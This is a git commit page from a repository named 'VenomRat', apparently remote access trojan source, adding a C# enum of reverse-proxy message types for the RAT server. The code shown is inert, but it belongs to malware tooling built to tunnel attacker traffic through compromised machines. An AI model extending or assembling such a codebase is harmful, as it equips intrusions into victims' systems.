VenomRat
This commit is contained in:
10
ReverseProxy/ReverseProxyCommands.cs
Normal file
10
ReverseProxy/ReverseProxyCommands.cs
Normal file
@@ -0,0 +1,10 @@
|
||||
namespace Server.ReverseProxy;
|
||||
|
||||
public enum ReverseProxyCommands
|
||||
{
|
||||
CONNECT,
|
||||
CONNECTRESPONSE,
|
||||
DATA,
|
||||
DISCONNECT,
|
||||
INIT
|
||||
}
|
||||
Reference in New Issue
Block a user